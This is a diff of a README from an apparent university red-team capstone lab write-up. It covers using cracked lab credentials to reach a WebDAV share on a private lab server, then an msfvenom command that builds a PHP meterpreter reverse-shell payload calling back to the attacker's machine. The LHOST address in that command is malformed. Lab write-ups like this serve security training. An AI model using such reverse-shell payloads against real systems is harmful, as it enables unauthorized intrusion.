Jay-Idrees/UPenn-CyberSecurity-Red-vs-Blue-Team-Metasploit-Kibana-Capstone/README.md

 ![](images-red/john-ryans-hash.png)

-- With this new information, now I have a `username`: **ryan** and a password: **linux4u** to access company's file sharing whose path was also revealed in the instructions: `dav://172.16.84.205/webdav`.
+- With this new information, now I have a `username`: **ryan** and a `password`: **linux4u** to access company's file sharing whose path was also revealed in the instructions: `dav://172.16.84.205/webdav`.
 I initially tried connecting to it multiple times, but failed.
 Then I noticed that there is a mistake in the "connect_to_corp" instructions file.
 Seems that AZURE has not updated.
 I guessed the correct path to be `dav://192.168.1.105/webdav`.
 Because from the scanning and enumeration stage I know that the IP address of the capstone webserver is `192.168.1.105` and not 172.16.84.205

-- You can connect filesharing on a remote server by clicking on the folder icon from the apps pannel in linux, selecting **`Other Locations`** and then typing in the address **`dav://192.168.1.105/webdav`** where it says "Connect to Server"
+- You can connect file sharing on a remote server by clicking on the folder icon from the apps panel in linux, selecting **`Other Locations`** and then typing in the address **`dav://192.168.1.105/webdav`** where it says "Connect to Server"

 ![](images-red/webdav-connect.png)

 ![](images-red/webdav-opened.png)

+- Now that I have acess to file sharing at Capsone VM through my Kali VM, I can hack Capstone by running a malacious script (if you may).

-- Msfvenom to create a reverse shell script in Kali Linux (hacker's VM)
+- To do this, on my Kali Vm I will use `msfvenom` to create a reverse shell payload script in Kali Linux (hacker's VM)

 - `msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1.90 LPORT=666 -f raw > shell.php`